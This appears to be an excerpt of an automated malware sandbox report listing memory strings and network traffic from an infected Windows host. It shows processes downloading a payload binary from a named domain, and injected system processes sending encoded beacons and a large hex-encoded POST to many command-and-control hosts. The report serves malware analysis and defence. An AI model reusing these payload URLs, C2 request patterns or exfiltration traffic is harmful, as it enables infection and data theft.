        Source: explorer.exe, 0000000D.00000000.25884137732.000000000B010000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.25967238414.0000000003800000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.26095564586.000000000A260000.00000002.00020000.sdmpString found in binary or memory: http://schemas.micro
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: http://www.foreca.com
        Source: ipconfig.exe, 0000000E.00000002.30171163705.000000000472B000.00000004.00020000.sdmpString found in binary or memory: http://www.mummymotors.com
        Source: ipconfig.exe, 0000000E.00000002.30171163705.000000000472B000.00000004.00020000.sdmpString found in binary or memory: http://www.mummymotors.com/n8ds/
        Source: explorer.exe, 0000000D.00000000.25923523579.0000000009CA3000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25879506622.0000000009CA3000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26091037711.0000000009CA3000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/odirmCHITECT
        Source: explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 0000000D.00000000.25892743156.000000000DC4C000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25991473088.000000000DC4C000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26108228042.000000000DC4C000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF
        Source: explorer.exe, 0000000D.00000000.25891843601.000000000DB97000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25944331523.00000000112A3000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26114152872.00000000112A3000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896724688.00000000112A3000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25938131496.000000000DB97000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26107410049.000000000DB97000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 0000000D.00000000.26092066193.0000000009D81000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25880373796.0000000009D81000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25976374515.0000000009D81000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25924643006.0000000009D81000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?9z
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 0000000D.00000000.25999514527.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898197362.00000000116D4000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?U
        Source: explorer.exe, 0000000D.00000000.25925791152.0000000009E62000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26093468212.0000000009E62000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25881260799.0000000009E62000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
        Source: k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmpString found in binary or memory: https://bgreenidaho.com/
        Source: BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpString found in binary or memory: https://bgreenidaho.com/%
        Source: k4n8p7lb.exe, 0000001B.00000002.29455284321.0000000002470000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453696047.0000000000734000.00000004.00000020.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.bin
        Source: k4n8p7lb.exe, 0000001A.00000003.29294372742.0000000000797000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29257058269.0000000000795000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29299837438.0000000000797000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29256180897.0000000000795000.00000004.00000001.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.bin%
        Source: k4n8p7lb.exe, 0000001A.00000002.29299426139.0000000000763000.00000004.00000020.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.bin)
        Source: k4n8p7lb.exe, 0000001A.00000002.29299426139.0000000000763000.00000004.00000020.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.bin9
        Source: BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.bin=
        Source: BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.binQ
        Source: k4n8p7lb.exe, 0000001A.00000002.29299157566.0000000000738000.00000004.00000020.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.binentVersion
        Source: k4n8p7lb.exe, 0000001B.00000003.29347013124.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347971433.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.binleK
        Source: k4n8p7lb.exe, 0000001B.00000003.29347013124.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347971433.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.binn
        Source: BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpString found in binary or memory: https://bgreenidaho.com/Newfile/bin_UFDek247.binu
        Source: BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpString found in binary or memory: https://bgreenidaho.com/U
        Source: ipconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpString found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
        Source: explorer.exe, 0000000D.00000000.25932869418.000000000D6A8000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26101869145.000000000D6A8000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887437575.000000000D6A8000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
        Source: explorer.exe, 0000000D.00000000.25925791152.0000000009E62000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26093468212.0000000009E62000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25881260799.0000000009E62000.00000004.00000001.sdmpString found in binary or memory: https://excel.offi
        Source: explorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpString found in binary or memory: https://excel.office.com
        Source: explorer.exe, 0000000D.00000000.26105450586.000000000D8F1000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25936306207.000000000D8F1000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25890275345.000000000D8F1000.00000004.00000001.sdmpString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
        Source: DB1.20.drString found in binary or memory: https://login.live.com/
        Source: ipconfig.exe, 0000000E.00000002.30164352520.000000000362E000.00000004.00000001.sdmp, cmd.exe, 00000014.00000003.28467193676.0000000000B95000.00000004.00000001.sdmp, cmd.exe, 00000014.00000002.28470916171.0000000003200000.00000004.00000001.sdmp, DB1.20.drString found in binary or memory: https://login.live.com//
        Source: cmd.exe, 00000014.00000003.28467193676.0000000000B95000.00000004.00000001.sdmp, cmd.exe, 00000014.00000002.28470916171.0000000003200000.00000004.00000001.sdmp, DB1.20.drString found in binary or memory: https://login.live.com/https://login.live.com/
        Source: ipconfig.exe, 0000000E.00000002.30164352520.000000000362E000.00000004.00000001.sdmp, cmd.exe, 00000014.00000003.28467193676.0000000000B95000.00000004.00000001.sdmp, cmd.exe, 00000014.00000002.28470916171.0000000003200000.00000004.00000001.sdmp, DB1.20.drString found in binary or memory: https://login.live.com/v104
        Source: explorer.exe, 0000000D.00000000.26113659674.0000000011224000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25943862085.0000000011224000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896429227.0000000011224000.00000004.00000001.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
        Source: explorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpString found in binary or memory: https://outlook.com
        Source: explorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpString found in binary or memory: https://powerpoint.office.com
        Source: explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://windows.msn.com:443/shell
        Source: explorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpString found in binary or memory: https://word.office.com
        Source: explorer.exe, 0000000D.00000000.25895579736.000000001114E000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26113659674.0000000011224000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25943862085.0000000011224000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25942840158.000000001114E000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26112555996.000000001114E000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25999514527.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898197362.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896429227.0000000011224000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
        Source: ipconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpString found in binary or memory: https://www.hostgator.com.br
        Source: explorer.exe, 0000000D.00000000.26101409229.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887040916.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25932474197.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25985258552.000000000D658000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
        Source: explorer.exe, 0000000D.00000000.26101409229.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887040916.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25932474197.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25985258552.000000000D658000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpg
        Source: explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpyu1SPS
        Source: explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25999514527.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898197362.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
        Source: explorer.exe, 0000000D.00000000.25999514527.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898197362.00000000116D4000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpm
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: ipconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpString found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.unitedmetal-saudi.com
        Source: ipconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpString found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
        Source: firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
        Source: unknownHTTP traffic detected: POST /n8ds/ HTTP/1.1Host: www.mummymotors.comConnection: closeContent-Length: 131142Cache-Control: no-cacheOrigin: http://www.mummymotors.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mummymotors.com/n8ds/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 5a 4f 44 3d 31 6a 59 6e 75 6e 61 33 66 6a 68 6a 68 59 45 73 67 77 34 72 68 47 6d 31 55 33 30 42 57 58 73 41 56 61 59 4c 4e 4f 4b 69 28 5a 6b 34 75 50 4f 33 47 4f 79 53 33 71 51 47 70 45 74 78 5a 64 7a 73 55 4e 72 61 49 45 44 39 33 59 64 74 6d 37 45 61 74 47 58 74 58 48 42 52 4d 46 65 68 47 49 6b 37 34 4d 61 77 49 47 73 4f 75 38 42 4a 52 4a 4a 2d 72 4b 5a 75 47 66 47 49 74 46 54 32 6e 77 79 35 30 41 6d 38 7e 48 4d 79 35 43 6b 58 75 4f 62 6c 43 6e 44 37 69 69 70 5f 51 30 77 48 4d 44 69 6b 69 31 39 68 7a 49 72 30 62 6a 6c 37 51 35 37 48 6f 44 6d 61 61 72 77 45 6a 72 70 38 6a 34 49 57 6f 6b 52 32 7a 5a 67 4e 6b 67 38 72 55 49 46 43 6f 79 57 44 55 36 4c 4e 37 38 62 38 7e 70 4a 69 50 71 57 6e 31 63 38 4a 53 42 38 68 50 42 74 74 37 4f 42 36 38 41 57 57 79 4f 53 78 54 70 56 4c 4d 53 58 37 49 46 52 6d 6b 51 45 41 73 54 6b 48 43 78 36 4d 4b 6c 6d 4e 4c 74 68 4a 33 4b 6f 45 4d 52 67 55 65 46 75 42 4d 4a 31 70 42 36 76 44 4f 74 73 68 69 63 7a 57 7e 31 6e 49 33 47 70 2d 6f 75 4e 47 55 6a 4d 70 50 4a 70 42 78 72 4c 6b 43 4d 53 6e 43 64 74 65 39 50 7e 6b 53 6a 56 52 77 45 63 7a 34 66 4f 72 6f 70 59 6b 78 62 4e 73 46 43 74 58 47 5a 71 68 41 4f 5a 32 34 43 57 4a 36 50 53 70 46 31 69 39 76 37 4e 72 68 4c 74 5f 63 70 47 4b 53 6d 6a 31 69 36 77 56 79 71 70 64 72 65 68 74 5a 52 44 55 52 4b 63 45 66 70 56 36 6f 69 50 51 6b 59 37 2d 65 2d 4d 77 68 36 35 4b 66 4b 4a 5f 68 57 58 61 6b 54 4a 6d 45 74 54 32 35 70 66 53 57 56 63 51 6d 75 46 51 75 7a 61 51 32 75 56 44 6f 67 67 73 57 4f 42 71 41 6b 55 6b 50 30 6c 36 70 73 33 74 6d 56 4e 4c 34 5f 64 76 66 46 65 4d 38 5a 53 54 50 52 74 5f 30 45 35 74 55 77 76 30 76 45 72 36 78 4a 7e 6c 42 2d 78 7a 6d 42 4f 31 69 62 4a 53 4d 46 32 45 77 38 6b 49 6a 4d 4a 74 6b 2d 39 58 65 38 75 30 52 68 55 6b 54 70 33 42 67 4d 36 79 77 33 53 55 57 36 41 35 52 6c 71 66 47 37 68 41 56 67 43 59 53 52 4b 31 37 4d 7a 35 62 68 50 62 72 62 4e 6e 70 4f 4a 79 61 54 49 56 6c 72 68 41 56 54 66 77 69 4e 37 49 28 72 52 67 7e 54 47 76 41 44 75 34 54 56 31 7a 4b 47 38 77 73 4d 33 6f 75 78 77 46 4d 51 68 6c 49 33 49 66 79 4f 55 54 63 5f 4a 45 55 49 78 76 69 4d 28 69 54 31 62 2d 49 4c 47 6c 39 44 42 49 76 49 70 45 42 30 67 58 31 42 62 45 4f 6a 46 4f 76 56 54 4e 34 33 38 59 7a 5f 7e 64 52 74 38 6a 67 4e 31 6e 32 62 6f 7a 6e 38 43 41 79 68 73 4e 43 38 43 49 54 71 70 6e 71 33 39 7a 52 65 70 70 31 6a 6f 71 71 36 36 74 67 35 49 52 30 6a 5a 4e 4c 70 4f 57 50 41 71 48 65 7a 7e 67 4c 68 31 35 37 70 6c 58 35 7a 4b 68 54 53 55 65 68 36 65 49 69 72 28 31 43 43 4e 7a 38 6b 37 34 50 49 46 65 6d 5a 46 42 56 50 54 6d 73 70 78 73 6c 67 75 4a 75 59 49 34 35 62 38 6c 43 36
        Source: unknownDNS traffic detected: queries for: bgreenidaho.com
        Source: global trafficHTTP traffic detected: GET /Newfile/bin_UFDek247.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: bgreenidaho.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /Newfile/bin_UFDek247.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: bgreenidaho.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /Newfile/bin_UFDek247.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: bgreenidaho.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=JCnWpsMsE1LhJoPwCBaMQ23aQlJM1lBrGqYKhWEiZBh+41Ky2Bnma6QhJDV2RS4wXNsD&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.diggingquartz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.ayudavida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.dietatrintadias.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl HTTP/1.1Host: www.helpcloud.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.stylesbykee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjn HTTP/1.1Host: www.mummymotors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1&E0Dpk=l8hHaF HTTP/1.1Host: www.fatima2021.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=wE3cJZPNojFXEHzVtPzLvjQgQ8siWlvoMBTDgMX5y9SxEB5bNYsjP9rL8bMOP+2FRUIW&E0Dpk=l8hHaF HTTP/1.1Host: www.talkingpoint.toursConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&E0Dpk=l8hHaF HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&E0Dpk=l8hHaF HTTP/1.1Host: www.unitedmetal-saudi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=Jv+KBR9TMcpwNTBIzPqg8qhOh/MOyYoQ7cFMdSYE1xgXhr2Qjx48HBx6QPFrGWZkW9Pq&E0Dpk=l8hHaF HTTP/1.1Host: www.palmasdelmarcondos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.dietatrintadias.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl HTTP/1.1Host: www.helpcloud.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.stylesbykee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjn HTTP/1.1Host: www.mummymotors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
